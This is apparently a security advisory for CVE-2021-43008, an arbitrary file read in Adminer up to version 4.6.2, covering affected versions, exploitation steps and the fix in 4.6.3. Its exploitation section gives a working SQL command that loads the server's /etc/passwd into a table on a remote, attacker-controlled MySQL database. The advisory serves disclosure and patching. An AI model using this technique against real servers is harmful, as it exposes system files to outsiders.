CVE-2021-43008 - Adminer - Arbitrary file read

Jul 17, 2021

cve unauthenticated web

Also available in: 🇫🇷

Résumé
Affected products
Exploitation
Mitigations
References

Titre : Adminer - Arbitrary file read
Auteur : @podalirius_
CVSS : 5.3 (Medium)
CVSS Vector : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Résumé

Improper Access Control in Adminer versions <= 4.6.2 (fixed in version 4.6.3) allows an attacker to achieve Arbitrary File Read on the server by connecting a remote MySQL database to the Adminer.

Affected products

All Adminer versions up to 4.6.2 (included) are vulnerable:

Adminer vulnerable versions

Exploitation

In order to exploit this vulnerability, an attacker needs to access the login page of Adminer and connect back to a remote MySQL database he controls:

After this, the attacker goes to the "SQL Command" page on the Adminer:

With the following SQL command, the attacker can read a local file on the Adminer server line and load it into his remote database:

LOAD DATA local INFILE '/etc/passwd' INTO TABLE lfr_sink_table fields TERMINATED BY "\n";

Once this is done, the attacker can view the contents of the read file with SELECT * FROM lfr_sink_table;:

Mitigations

In order to fix this vulnerability you need to update your Adminer to the latest version or a version >= 4.6.3. This vulnerability was fixed by the editor in version 4.6.3.

References

http://sansec.io/research/adminer-4.6.2-file-disclosure-vulnerability
https://www.adminer.org/